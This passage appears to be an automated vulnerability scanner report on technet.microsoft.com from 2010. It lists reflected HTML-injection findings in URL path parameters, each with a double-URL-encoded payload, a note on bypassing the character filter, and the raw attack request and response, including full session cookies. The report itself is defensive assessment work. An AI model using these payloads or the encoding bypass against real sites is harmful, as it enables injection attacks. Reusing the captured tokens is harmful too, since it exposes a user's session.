P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:58:22 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library2486a"><a>b2bd1f24788/bb727028" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 124d4%2522%253e%253ca%253e407068ac6b7 was submitted in the REST URL parameter 3. This input was echoed as 124d4"><a>407068ac6b7 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/bb727028.aspx124d4%2522%253e%253ca%253e407068ac6b7 HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10210
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:58:29 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/bb727028.aspx124d4"><a>407068ac6b7" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6748%2522%253e%253ca%253ebad19ad9df7 was submitted in the REST URL parameter 1. This input was echoed as c6748"><a>bad19ad9df7 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-usc6748%2522%253e%253ca%253ebad19ad9df7/library/bb727030.aspx HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10200
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:21:37 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usc6748"><a>bad19ad9df7/library/bb727030" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6fed7%2522%253e%253ca%253eef97a0d12cf was submitted in the REST URL parameter 2. This input was echoed as 6fed7"><a>ef97a0d12cf in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library6fed7%2522%253e%253ca%253eef97a0d12cf/bb727030.aspx HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10201
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:22:30 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library6fed7"><a>ef97a0d12cf/bb727030" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff840%2522%253e%253ca%253e8b8b766e8e was submitted in the REST URL parameter 3. This input was echoed as ff840"><a>8b8b766e8e in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/bb727030.aspxff840%2522%253e%253ca%253e8b8b766e8e HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10209
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:23:20 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/bb727030.aspxff840"><a>8b8b766e8e" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a36d8%2522%253e%253ca%253e73909da25c3 was submitted in the REST URL parameter 1. This input was echoed as a36d8"><a>73909da25c3 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-usa36d8%2522%253e%253ca%253e73909da25c3/library/bb727032.aspx HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10200
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:58:16 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usa36d8"><a>73909da25c3/library/bb727032" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38b4e%2522%253e%253ca%253e81d8c2f2d6 was submitted in the REST URL parameter 2. This input was echoed as 38b4e"><a>81d8c2f2d6 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library38b4e%2522%253e%253ca%253e81d8c2f2d6/bb727032.aspx HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10198
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:58:25 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library38b4e"><a>81d8c2f2d6/bb727032" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80878%2522%253e%253ca%253e3c2f7f52469 was submitted in the REST URL parameter 3. This input was echoed as 80878"><a>3c2f7f52469 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/bb727032.aspx80878%2522%253e%253ca%253e3c2f7f52469 HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
